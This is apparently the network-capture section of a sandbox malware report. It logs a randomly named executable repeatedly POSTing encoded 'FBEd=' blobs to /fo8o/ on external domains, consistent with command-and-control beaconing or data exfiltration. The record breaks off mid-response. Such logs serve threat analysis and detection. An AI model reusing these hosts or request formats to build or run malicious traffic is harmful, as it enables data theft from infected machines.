May 8, 2024 10:50:01.722522974 CEST	767	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 45 6d 33 64 62 52 30 62 51 36 71 65 47 51 6a 62 50 78 5a 39 4f 7a 35 56 43 53 66 Data Ascii: FBEd=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0Em3dbR0bQ6qeGQjbPxZ9Oz5VCSf
May 8, 2024 10:50:02.122688055 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 08 May 2024 08:50:01 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49725	85.159.66.93	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:04.607462883 CEST	791	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 33 62 45 6e 31 42 6a 47 4d 32 32 4a 6f 74 44 6b 4a 79 47 6e 78 76 45 65 4b 35 51 3d 3d Data Ascii: FBEd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5v3bEn1BjGM22JotDkJyGnxvEeK5Q==
May 8, 2024 10:50:04.999367952 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 08 May 2024 08:50:04 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49726	85.159.66.93	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:08.829221964 CEST	1804	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 64 30 37 2b 54 57 4b 4b 33 48 63 2b 76 79 77 31 69 48 36 48 36 48 37 46 6a 59 4a 63 59 73 72 2b 5a 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 [TRUNCATED] Data Ascii: FBEd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpd07+TWKK3Hc+vyw1iH6H6H7FjYJcYsr+ZUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs94QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRqSPONduHp5ua2VurEsyLtqn9Hwf4C+3V5P8iD6jh4S6IfuEsb550muWnceqjpZzyLMUiESspZqU2hzpCChAI0GyglfCGDRHNqW+tFURp11YGc4A0reLXUzjDj4JByPzEbgspUA5JwcSASV3I+aUtmMqNg6EIe8XkcdGCDX/OkbL49KZb+KDffwx+CbNQ3yAo7NjvmTYSR8DAfc3qQFbJPrpnFVmSumx9p8/UGwPjka2ik/8lUJTEmUQOF8t/UX1EZy206WWjGfqznG992crrnYbPxZEZ3IUAI+EcS/x8UC98CIKe858+IvPaiGHtENm0BGDOEoF2or9zLjdM6mFSouf9ml7830pwh62vBcEnpIoTgX+kmpIDfBbyxEMxpL1I0jbQa43dteSkIEcKOScn2lTbpbUKGHck8WQeIIbxXpAjcxAI4p+jGFcsuPfsnvRkHTNdYWS7kbSdvJSBTKsqsXOKSRayjS6JW050V05PGbfj++eyDafYuDvyYk1E9qx+aLTmnDE6j7C9UlO65mjfGgehCI6HEmghAMegoadZscG+DgL9ZeNJ+UpSnawN6qWt1SVi4WOlvahOZ2iM8FSk [TRUNCATED]
May 8, 2024 10:50:09.224093914 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 08 May 2024 08:50:09 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-05-08T08:50:14.0491826Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49727	85.159.66.93	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:11.721383095 CEST	500	OUT	GET /fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:50:12.084863901 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 08 May 2024 08:50:11 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-05-08T08:50:16.9082388Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49728	91.195.240.94	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:17.592354059 CEST	770	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 50 59 32 62 39 49 2f 72 43 4d 46 39 71 6e 72 74 44 4b 75 56 32 7a 56 31 67 5a 57 Data Ascii: FBEd=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pPY2b9I/rCMF9qnrtDKuV2zV1gZW
May 8, 2024 10:50:17.907753944 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 08 May 2024 08:50:17 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49729	91.195.240.94	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:20.438882113 CEST	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 62 37 6d 73 38 61 6e 6d 4e 4b 69 73 64 68 4b 65 52 71 4e 47 51 36 78 53 50 4d 41 3d 3d Data Ascii: FBEd=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvb7ms8anmNKisdhKeRqNGQ6xSPMA==
May 8, 2024 10:50:20.751082897 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 08 May 2024 08:50:20 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49730	91.195.240.94	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:23.280328989 CEST	1807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 34 58 6f 6c 65 44 6d 74 4b 79 67 64 33 62 61 7a 31 66 61 45 79 6a 66 6e 5a 33 75 6d 6b 77 4e 56 48 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 37 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 [TRUNCATED] Data Ascii: FBEd=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gYQ3T4XoleDmtKygd3baz1faEyjfnZ3umkwNVHOhO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC7ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdGN+GqOOAs4KXirg6C1gh2USW7d63Rm4PjACzgVABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvj/iZcEQa7NOsDrjsl9yEA8fQWDkUwWPAP6bcuuPfldXADMZPWKj/pAuf6uOWPjBUs3f+AIAk7ONsDhMIklon9ELmFSO9GOsSUAQ2FtA6Kdg5kUprNFaclyv5MCW3F3PFUIQKk1Zzr+jA/BARBCfsVXSGDeSf/bUdiQBeEWLpD2FQRNMa+pTSZwhUDxVuJ2jz9m3jC5KV8bGCo/FrNqMoJsrPeYdIe3SH29deJkEOKjv2UxwnV6BD4ezrjEf9Okg8TIe3a+fsl6n+3Hc6MYeFsrJOmFPv4990K9yMSncfxPUkb/ioR724EBZDsMDVs2ohqwyXL2m+Oh5oAIoGIlHmDz0GhDM4rNTJU5ygvfSG/Yh3SbRdsxSGiG0a2ZGrzHU9mZO+m6tWhQ687NMYUmRtQ8J0lBthTt6L+ofjNX6ZJdPSn4SvirfVv88m/mR288kNihY5ZWHVtC05600PsY/WrxP1drF80pf8psZ/Iq7IQly5yIRx3m+Jvdv3YpekwBNvlQzGuR5QZS8o61ss [TRUNCATED]
May 8, 2024 10:50:23.592673063 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 08 May 2024 08:50:23 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49731	91.195.240.94	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:26.828907967 CEST	501	OUT	GET /fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:50:27.192311049 CEST	1289	IN	HTTP/1.1 200 OK date: Wed, 08 May 2024 08:50:27 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RycKZ2lYHFeY0tyJmQCyoYNg198BwFa+1AYmNqnNkreObkT89wJWYLhE5//QE9mJ191aRhtwzglJ0KMWnLGeUg== last-modified: Wed, 08 May 2024 08:50:26 GMT x-cache-miss-from: parking-7cbf88ff6b-zv9hm server: NginX connection: close Data Raw: 38 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 